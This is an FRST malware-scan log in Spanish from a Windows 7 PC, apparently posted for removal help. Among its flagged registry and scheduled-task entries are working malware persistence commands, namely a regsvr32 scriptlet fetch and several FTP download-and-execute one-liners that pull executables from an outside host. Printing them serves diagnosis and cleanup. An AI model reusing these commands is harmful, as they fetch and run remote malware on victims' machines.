Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 19-04-2020 Ejecutado por Sergio (administrador) sobre ANDROID (20-04-2020 11:28:06) Ejecutado desde C:\Users\Sergio\Downloads Perfiles cargados: Sergio (Perfiles disponibles: Sergio) Platform: Windows 7 Professional Service Pack 1 (X64) Idioma: Español (España, internacional) Internet Explorer Versión 11 (Navegador predeterminado: Chrome) Modo de Inicio: Normal Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Procesos (Lista blanca) ================= (Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.) (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <13> (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe (Jan Fiala -> Jan Fiala) C:\Program Files (x86)\PSPad editor\PSPad.exe (Malwarebytes Inc -> Malwarebytes) C:\Users\Sergio\Downloads\adwcleaner_8.0.4 (1).exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\alg.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\ftp.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\perfmon.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\taskmgr.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe ==================== Registro (Lista blanca) =================== (Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.) HKLM-x32\...\Run: [win_en_77] => [X] HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATENCIÓN HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\MountPoints2: {c22f5e7f-c8b7-11e4-97b8-d050990cc891} - E:\HTC_Sync_Manager_PC.exe HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\MountPoints2: {c3a4be83-c8a2-11e4-9624-d050990cc891} - E:\HTC_Sync_Manager_PC.exe HKU\S-1-5-18\...\RunOnce: [SPReview] => "C:\Windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"hxxp://go.microsoft.com/fwlink/?LinkID=122915" /build:7601 HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.163\Installer\chrmstp.exe [2020-04-03] (Google LLC -> Google LLC) HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\80.1.7.92\Installer\chrmstp.exe [2020-04-14] (Brave Software, Inc.) [Archivo no firmado] HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.81\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2019-05-03] (Adobe Inc. -> Adobe Systems, Inc.) FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restricción <==== ATENCIÓN CHR HKLM\SOFTWARE\Policies\Google: Restricción <==== ATENCIÓN ==================== Tareas programadas (Lista blanca) ============ (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) Task: {0AA756ED-C11E-443E-ACD7-15EEEEA3D032} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-09] (Google Inc -> Google Inc.) Task: {0E80A780-6A4C-43ED-B5A3-E04DF3F4863F} - System32\Tasks\Driver Easy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe [3660232 2020-02-17] (Easeware Technology Limited -> Easeware) Task: {19AFE59E-C46B-406C-9466-768A21152A88} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-04-14] (Adobe Inc. -> Adobe) Task: {2225AEDE-34CC-47DD-BDD1-72AA8D70B830} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [157320 2020-02-25] (Brave Software, Inc. -> BraveSoftware Inc.) Task: {2D6A1470-CFFF-4CE4-9A72-B326F2C3379C} - System32\Tasks\Yandere Simulator => C:\Users\Sergio\AppData\Local\Temp\is-FCU7B.tmp\prsetup.exe <==== ATENCIÓN Task: {3C3D898D-DFC3-43B5-B23C-48BF210DBB8C} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATENCIÓN Task: {45616622-DBF1-4D54-808E-75A661575493} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATENCIÓN Task: {4A936A41-94E4-4364-BDD4-7F19E924C95D} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [158536 2020-04-17] (Microsoft Corporation -> Microsoft Corporation) Task: {5AAF7833-A3CA-4499-A3BE-20CC73E9D088} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [158536 2020-04-17] (Microsoft Corporation -> Microsoft Corporation) Task: {5E3FE145-33FF-4C4B-A958-22A971A17DCD} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe Task: {60AB0E39-FE9F-4770-A1C2-733FBE54DD7E} - System32\Tasks\{43FC10D7-DE22-483D-A901-9E706D3F4D28} => C:\Windows\system32\pcalua.exe -a "E:\Impresora 3D\Copia de seguridad\2.Software and Drive\Drive\FTDI USB Drivers\win\FTDI USB Drive2\FTDIUNIN.exe" -d "E:\Impresora 3D\Copia de seguridad\2.Software and Drive\Drive\FTDI USB Drivers\win\FTDI USB Drive2" Task: {6B3A2012-763F-44F2-AEBC-84F44ADD3C01} - System32\Tasks\{70368C34-EC93-4F0C-A128-EB3D83B6718B} => C:\Windows\system32\pcalua.exe -a "F:\Impresora 3D\Copia de seguridad\CH340 Drive\Win\CH340IR.EXE" -d "F:\Impresora 3D\Copia de seguridad\CH340 Drive\Win" Task: {6BB2C75D-EF13-4557-BBD2-24B515C02038} - System32\Tasks\AdobeAAMUpdater-1.0-Cafetera-Sergio => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated) Task: {7EEE71B6-9E3E-43ED-AD2A-761A87887346} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [157320 2020-02-25] (Brave Software, Inc. -> BraveSoftware Inc.) Task: {83E094F4-AB0D-4F4B-80DF-B9ADE94CFCEF} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATENCIÓN Task: {8EEB51B5-020F-451E-92CD-6CA3AA953D37} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [4613912 2014-03-18] (Piriform Ltd -> Piriform Ltd) Task: {8F04E7AB-5361-4CD4-84A7-D263FE9AF61B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1242704 2020-02-25] (Adobe Inc. -> Adobe Systems) Task: {91CFCCD9-304B-463E-A25D-4DBA4CDC0EDE} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_363_Plugin.exe [1458232 2020-04-14] (Adobe Inc. -> Adobe) Task: {9812422D-412B-472F-994A-3E78F33F05F5} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [6160288 2020-04-17] (Microsoft Corporation -> Microsoft Corporation) Task: {B4153247-847B-40D3-AC02-519CEAB315B9} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2463064 2020-03-14] (Overwolf Ltd -> Overwolf LTD) Task: {C991CC15-D271-461C-AF3A-83B3C1FDF51F} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [60008 2020-02-28] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {D065DFC2-5227-48F7-8A1B-675BA262BE52} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24609368 2020-04-02] (Microsoft Corporation -> Microsoft Corporation) Task: {D9D8BBBA-2CFF-4AFE-9023-BE619C9C8EF6} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATENCIÓN Task: {DD00865F-4914-4914-97CA-9554C8903E12} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [6160288 2020-04-17] (Microsoft Corporation -> Microsoft Corporation) Task: {DFFC06D2-4846-4338-BEBA-09C6CEE9E5DE} - System32\Tasks\{DF1343B9-6946-4395-B664-9EF408EEBC85} => C:\Windows\system32\pcalua.exe -a F:\HTCDriverInstaller.exe -d F:\ Task: {E00D2FF5-AB9D-4D3A-8DBA-47D2225E2513} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24609368 2020-04-02] (Microsoft Corporation -> Microsoft Corporation) Task: {E3D6361C-403A-43B2-B6E7-2A0BBA91C28C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-09] (Google Inc -> Google Inc.) Task: {EEFF36D1-2149-4418-8782-27F68EB3EA46} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [67688 2020-02-28] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) Task: {F6711BC9-3704-4C43-AD07-D55BB3145703} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATENCIÓN (Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.) Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe ==================== Internet (Lista blanca) ==================== (Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.) HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{aa65884d-86c8-478b-917a-6fb4b99fadba} <==== ATENCIÓN (Restricción - IP) ProxyServer: [S-1-5-21-3987761340-688897333-2164730740-1001] => 127.0.0.1:9666 Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{8169185C-5CDC-4055-BDB3-85ACCE9C7ACE}: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{95DC9BE1-70FB-4506-BF3B-EC90C3022568}: [DhcpNameServer] 80.58.61.250 80.58.61.254 Tcpip\..\Interfaces\{DF220DF9-A6B6-4017-B031-24EB952400CD}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131074930739632137&GUID=00000000-0000-0000-0000-000000000000 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131074930739632137&GUID=00000000-0000-0000-0000-000000000000 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2020-01-12] (Microsoft Corporation -> Microsoft Corporation) BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation -> Microsoft Corporation) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\root\Office16\URLREDIR.DLL [2020-04-17] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2020-01-12] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-04-09] (Oracle America, Inc. -> Oracle Corporation) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL [2020-04-17] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-04-09] (Oracle America, Inc. -> Oracle Corporation) Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-03-08] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-03-08] (Microsoft Corporation -> Microsoft Corporation) Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-03-08] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-03-08] (Microsoft Corporation -> Microsoft Corporation) Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-03-08] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-03-08] (Microsoft Corporation -> Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2020-03-08] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2020-03-08] (Microsoft Corporation -> Microsoft Corporation) StartMenuInternet: IEXPLORE.EXE - iexplore.exe FireFox: ======== FF DefaultProfile: glfi9gpk.default FF ProfilePath: C:\Users\Sergio\AppData\Roaming\Mozilla\Firefox\Profiles\glfi9gpk.default [2020-04-20] FF Homepage: Mozilla\Firefox\Profiles\glfi9gpk.default -> hxxps://www.malwarebytes.org/restorebrowser/ FF HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\Firefox\Extensions: [magicplayer@torrentstream.org] - \extensions\firefox\magicplayer@torrentstream.org => no encontrado FF HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\Sergio\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => no encontrado FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_363.dll [2020-04-14] (Adobe Inc. -> ) FF Plugin: @microsoft.com/GENUINE -> disabled [Ningún archivo] FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-01-12] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2017-09-20] (Adobe Systems Incorporated -> Adobe Systems) FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems Incorporated -> Adobe Systems) FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [Ningún archivo] FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_363.dll [2020-04-14] (Adobe Inc. -> ) FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-04-09] (Oracle America, Inc. -> Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-04-09] (Oracle America, Inc. -> Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Ningún archivo] FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-12-09] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2020-01-12] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Ningún archivo] FF Plugin-x32: @tools.brave.com/BraveSoftware Update;version=3 -> C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\npBraveUpdate3.dll [2020-02-25] (Brave Software, Inc. -> BraveSoftware Inc.) FF Plugin-x32: @tools.brave.com/BraveSoftware Update;version=9 -> C:\Program Files (x86)\BraveSoftware\Update\1.3.99.0\npBraveUpdate3.dll [2020-02-25] (Brave Software, Inc. -> BraveSoftware Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN -> VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN -> VideoLAN) FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN -> VideoLAN) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-03-06] (Adobe Inc. -> Adobe Systems Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-09-20] (Adobe Systems Incorporated -> Adobe Systems) FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems Incorporated -> Adobe Systems) FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [Ningún archivo] FF Plugin HKU\S-1-5-21-3987761340-688897333-2164730740-1001: @acestream.net/acestreamplugin,version=2.2.4-next -> \player\npace_plugin.dll [Ningún archivo] FF Plugin HKU\S-1-5-21-3987761340-688897333-2164730740-1001: @acestream.net/acestreamplugin,version=3.1.16.1 -> C:\Users\Sergio\AppData\Roaming\ACEStream\player\npace_plugin.dll [Ningún archivo] FF Plugin HKU\S-1-5-21-3987761340-688897333-2164730740-1001: @hola.org/FlashPlayer -> C:\Users\Sergio\AppData\Local\Hola\firefox_hola\app\flash\NPSWF32_18_0_0_232.dll [Ningún archivo] FF Plugin HKU\S-1-5-21-3987761340-688897333-2164730740-1001: @hola.org/vlc -> C:\Users\Sergio\AppData\Local\Hola\firefox_hola\app\vlc\npvlc.dll [Ningún archivo] Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default [2020-04-20] CHR Notifications: Default -> hxxps://hacktheflight.net; hxxps://morelegends.com; hxxps://my.jdownloader.org; hxxps://web.telegram.org; hxxps://web.whatsapp.com; hxxps://www.exprimeviajes.com CHR Extension: (Documentos) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-15] CHR Extension: (Google Drive) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-03-17] CHR Extension: (YouTube) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-03-24] CHR Extension: (uBlock Origin) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2020-02-07] CHR Extension: (Avast SafePrice | Comparaciones, ofertas y cupones) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2020-03-20] CHR Extension: (Escritorio Remoto de Chrome) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2019-07-17] CHR Extension: (Documentos de Google sin conexión) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-03-14] CHR Extension: (Avast Online Security) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2020-03-02] CHR Extension: (Ace Script) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\mjbepbhonbojpoaenhckjocchgfiaofo [2018-12-16] CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-09-30] CHR Extension: (Hola - Unlimited Proxy VPN) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\opalpjjboefohnelaemnhdhlceibbcgl [2016-03-30] CHR Extension: (Gmail) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-07] CHR Extension: (Chrome Media Router) - C:\Users\Sergio\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-04] CHR HKLM\...\Chrome\Extension: [kaebhgioafceeldhgjmendlfhbfjefmo] - C:\Program Files (x86)\EagleGet\addon\eagleget_cext@eagleget.com.crx CHR HKU\S-1-5-21-3987761340-688897333-2164730740-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\Sergio\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx CHR HKU\S-1-5-21-3987761340-688897333-2164730740-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] ==================== Servicios (Lista blanca) =================== (Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.) S4 ADExchange; C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe [44736 2013-10-24] (ArcSoft, Inc. -> ArcSoft, Inc.) S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [817760 2017-09-20] (Adobe Systems Incorporated -> Adobe Systems Incorporated) S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2257016 2017-08-23] (Adobe Systems Incorporated -> Adobe Systems, Incorporated) S4 AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [515256 2020-04-01] (Advanced Micro Devices, Inc. -> AMD) S4 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [190464 2020-02-28] () [Archivo no firmado] S4 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [157320 2020-02-25] (Brave Software, Inc. -> BraveSoftware Inc.) S4 